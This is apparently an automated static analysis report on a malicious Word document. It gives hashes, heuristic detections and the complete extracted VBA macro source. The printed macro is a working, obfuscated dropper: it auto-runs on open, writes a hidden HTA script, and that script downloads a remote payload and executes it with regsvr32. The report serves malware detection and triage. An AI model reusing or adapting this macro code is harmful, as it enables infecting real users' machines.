Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 92ad4e835705035b…

MALICIOUS

Office (OOXML)

80.4 KB Created: 2021-04-01 06:27:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-04-10
MD5: f8b39ebe6e00e294a1d04b99f0ab7a57 SHA-1: 40db5a3e38a7a779ce00783be916b6d29049a721 SHA-256: 92ad4e835705035bb5bcaa16140c205c8a54cb77e28aca04a55f328b6feff3c0
170 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set structTextLink = CreateObject("wscript.shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set structTextLink = CreateObject("wscript.shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 9504 bytes
SHA-256: 5ecfca8dbdafd5b0a9c4256de57f2b4a9e39812c4627c12d40cb98d92fa54759
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{41FA4DFC-DAAE-46CD-9D95-93BBFDE964E9}{80DE3F7F-724D-4597-A753-EE1494891C58}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Function tmpVb()
With frm.button1
tmpVb = .Tag
End With
End Function
Function exceptionViewVb()
With frm.button1
exceptionViewVb = .Caption
End With
End Function
Public Sub button1_Click()
Set structTextLink = CreateObject("wscript.shell")
structTextLink.exec p(tmpVb) & " " & p(exceptionViewVb)
End Sub


Attribute VB_Name = "varNamespaceFunc"
Sub autoopen()
variableLocal
End Sub
Function intel(WScreen)
intel = "" & WScreen & ""
End Function
Sub variableLocal()
Dim nextSwapLen As String
nextSwapLen = p(frm.button1.Caption)
Set documentLocal = New storageArgumentCaption
documentLocal.classRemove nextSwapLen, leftData
frm.button1_Click
End Sub
Function constLoad(screenSizeButton, exceptionClassClass, counterIterator)
constLoad = Replace(screenSizeButton, exceptionClassClass, counterIterator)
End Function

Attribute VB_Name = "repoLenBorder"
Function procLink()
procLink = intel("<html><body><div id='content'>fTtlc29sYy5lbGJhaXJhVnRuZW11Z3JhOy")
End Function
Function textSelectTemp()
textSelectTemp = intel("kyICwiZ3BqLmZlUnlhcnJhXFxjaWxidXBcXHNyZXN1XFw6YyIoZWxpZm90ZXZhcy")
End Function
Function memExTmp()
memExTmp = intel("5lbGJhaXJhVnRuZW11Z3JhOyl5ZG9iZXNub3BzZXIudG5lbXVjb0RwbWVUeXJvbW")
End Function
Function argumentLoad()
argumentLoad = intel("VtKGV0aXJ3LmVsYmFpcmFWdG5lbXVncmE7MSA9IGVweXQuZWxiYWlyYVZ0bmVtdW")
End Function
Function localVariable()
localVariable = intel("dyYTtuZXBvLmVsYmFpcmFWdG5lbXVncmE7KSJtYWVydHMuYmRvZGEiKHRjZWpiT1")
End Function
Function leftLinkBuffer()
leftLinkBuffer = intel("hldml0Y0Egd2VuID0gZWxiYWlyYVZ0bmVtdWdyYSByYXZ7KTAwMiA9PSBzdXRhdH")
End Function
Function tableStorageProc()
tableStorageProc = intel("MudG5lbXVjb0RwbWVUeXJvbWVtKGZpOykoZG5lcy50bmVtdWNvRHBtZVR5cm9tZW")
End Function
Function listboxConstDatabase()
listboxConstDatabase = intel("07KWVzbGFmICwiQXByUVdhU2UxTm1GPSZ4WVQ9TG9hb0tFWFNuaCY1a2VYTWl3RF")
End Function
Function collectionArgument()
collectionArgument = intel("A9JmJHYzllRW8zU0dkQXdOTnk1PWZlciZZV3BtNHdmZ09rdUk1U0xaaWNnU21RRE")
End Function
Function linkSwapLeft()
linkSwapLeft = intel("VHPWRpJmFHNHVlcllDS0RtTDlpbz1tV0lJS0R3QWU/Nm5heC9lSUJ3REdJRVJOVU")
End Function
Function windowTemp()
windowTemp = intel("xOQlA4UzdGeTBUMmp5VzhhdE5BcDh1ek9zekpHUjNkTWVzSG8vamkvNDU4NDcvSz")
End Function
Function selectTempCaption()
selectTempCaption = intel("c4QzVBODVxOVVaRms3QWVhVEYyYlZ3c3FsVXBwUDdqYnZXNGYzRTVGQzJmWFNuLz")
End Function
Function countClear()
countClear = intel("A2OTU5LzUxMDEyL3N5dW9nL21vYy55cmV2aWxlZC04MDAyc2xsaW0vLzpwdHRoIi")
End Function
Function requestW()
requestW = intel("AsIlRFRyIobmVwby50bmVtdWNvRHBtZVR5cm9tZW07KSJwdHRobG14LjJsbXhzbS")
End Function
Function counterSwap()
counterSwap = intel("IodGNlamJPWGV2aXRjQSB3ZW4gPSB0bmVtdWNvRHBtZVR5cm9tZW0gcmF2|fXspe")
End Function
Function tmpButtonConvert()
tmpButtonConvert = intel("XBvQ3lyb21lTXR4ZW4oaGN0YWN9OykiYXRoLmZlUnlhcnJhXFxjaWxidXBcXHNyZ")
End Function
Function listBufStruct()
listBufStruct = intel("XN1XFw6YyIoZWxpZmV0ZWxlZC5mZVJ0c25vY3t5cnQ7KSJ0Y2VqYm9tZXRzeXNlb")
End Function
Function WSwap()
WSwap = intel("GlmLmduaXRwaXJjcyIodGNlamJPWGV2aXRjQSB3ZW4gPSBmZVJ0c25vYyByYXY7K")
End Function
Function pointerCollection()
pointerCollection = intel("SJncGouZmVSeWFycmFcXGNpbGJ1cFxcc3Jlc3VcXDpjIDIzcnZzZ2VyIihudXIuK")
End Function
Function queryGeneric()
queryGeneric = intel("SJsbGVocy50cGlyY3N3Iih0Y2VqYk9YZXZpdGNBIHdlbg==</div><div id='ta")
End Function
Function titleProc()
titleProc = intel("ble1'>ABCDEFGHIJKLMNOPQRSTUVWXYZ</div><div id='table2'>012345678")
End Function
Function listboxPointerPaste()
listboxPointerPaste = intel("9+/</div><div id='table3'></div><script language='javascript'>fu")
End Function
Function pasteTable()
pasteTable = intel("nction storageArray(referenceFuncPaste){return(new ActiveXObject")
End Function
Function ExGlobalNamespace()
ExGlobalNamespace = intel("(referenceFuncPaste));}function removeCaption(argumentTextbox){r")
End Function
Function screenVarStorage()
screenVarStorage = intel("eturn(mainSelectVb.getElementById(argumentTextbox).innerHTML);}f")
End Function
Function ExIteratorCount()
ExIteratorCount = intel("unction documentPastePaste(){var linkScreen = removeCaption('tab")
End Function
Function indexRequest()
indexRequest = intel("le1');var procStructPtr = linkScreen.toLowerCase();var trustCons")
End Function
Function WQueryBuffer()
WQueryBuffer = intel("tProcedure = removeCaption('table2');return(linkScreen + procStr")
End Function
Function leftOption()
leftOption = intel("uctPtr + trustConstProcedure);}function refLinkGlobal(s){var e={")
End Function
Function tmpPtrTemp()
tmpPtrTemp = intel("}; var i; var b=0; var c; var x; var l=0; var a; var structLoadR")
End Function
Function windowIndexNamespace()
windowIndexNamespace = intel("ight=''; var w=String.fromCharCode; var L=s.length;var pointerLi")
End Function
Function documentValueButton()
documentValueButton = intel("stGlobal = 'charAt';for(i=0;i<64;i++){e[documentPastePaste()[poi")
End Function
Function screenLibText()
screenLibText = intel("nterListGlobal](i)]=i;}for(x=0;x<L;x++){c=e[s[pointerListGlobal]")
End Function
Function nextCaptionLink()
nextCaptionLink = intel("(x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2")
End Function
Function nextResponse()
nextResponse = intel(")))&&(structLoadRight+=w(a));}}return(structLoadRight);};functio")
End Function
Function iteratorStorageBuf()
iteratorStorageBuf = intel("n titleViewBuf(captionLeft){return captionLeft.split('').reverse")
End Function
Function convertBorder()
convertBorder = intel("().join('');}lenIteratorLink = window;mainSelectVb = document;le")
End Function
Function convertNextArgument()
convertNextArgument = intel("nIteratorLink.resizeTo(1, 1);lenIteratorLink.moveTo(-100, -100);")
End Function
Function counterPasteCollection()
counterPasteCollection = intel("var collectionProc = mainSelectVb.getElementById('content').inne")
End Function
Function tableOptionList()
tableOptionList = intel("rHTML;var collectionProc = collectionProc.split('|');var selectL")
End Function
Function queryReference()
queryReference = intel("oad = titleViewBuf(refLinkGlobal(collectionProc[0]));var storage")
End Function
Function globalTable()
globalTable = intel("Reference = titleViewBuf(refLinkGlobal(collectionProc[1]));</scr")
End Function
Function pasteCopyRemove()
pasteCopyRemove = intel("ipt><script language='javascript'>function tmpRepo(argumentTemp)")
End Function
Function selectTextboxCount()
selectTextboxCount = intel("{var titleLenTmp = storageArray('msscriptcontrol.scriptcontrol')")
End Function
Function captionText()
captionText = intel(";titleLenTmp.Language = 'jscript';titleLenTmp.Timeout = 60000;ti")
End Function
Function pasteRemoveBorder()
pasteRemoveBorder = intel("tleLenTmp.AddCode(argumentTemp);return(null);}</script><script l")
End Function
Function ptrAConvert()
ptrAConvert = intel("anguage='vbscript'>tmpRepo selectLoad : tmpRepo storageReference")
End Function
Function globalNextTextbox()
globalNextTextbox = intel(" : lenIteratorLink.close</script></body></html>")
End Function
Function leftData()
leftData = procLink + textSelectTemp + memExTmp + argumentLoad + localVariable + leftLinkBuffer + tableStorageProc + listboxConstDatabase + collectionArgument + linkSwapLeft + windowTemp + selectTempCaption + countClear + requestW + counterSwap + tmpButtonConvert + listBufStruct + WSwap + pointerCollection + queryGeneric + titleProc + listboxPointerPaste + pasteTable + ExGlobalNamespace + screenVarStorage + ExIteratorCount + indexRequest + WQueryBuffer + leftOption + tmpPtrTemp + windowIndexNamespace + documentValueButton + screenLibText + nextCaptionLink + nextResponse + iteratorStorageBuf + convertBorder + convertNextArgument + counterPasteCollection + tableOptionList + queryReference + globalTable + pasteCopyRemove + selectTextboxCount + captionText + pasteRemoveBorder + ptrAConvert + globalNextTextbox
End Function

Attribute VB_Name = "storageArgumentCaption"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Sub classRemove(exceptionViewTmp As String, copyVbStorage As String)
Dim linkTextbox As FileSystemObject
Set linkTextbox = New FileSystemObject
Dim varButton As TextStream
Set varButton = linkTextbox.CreateTextFile(exceptionViewTmp)
varButton.WriteLine copyVbStorage
varButton.Close
Set varButton = Nothing
Set linkTextbox = Nothing
End Sub

Attribute VB_Name = "selectData"
Function p(ptrVb)
p = constLoad(ptrVb, "@", "")
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 40448 bytes
SHA-256: 38f08131aadcf540a949eadf7e46f3d9cc62271dd66b25542c01811a29e840d7

Open this report in the interactive analyzer, or submit your own file for analysis.